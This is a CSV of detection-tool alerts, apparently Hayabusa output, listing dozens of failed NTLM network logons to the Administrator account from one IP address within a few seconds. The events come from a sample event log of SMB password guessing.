2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
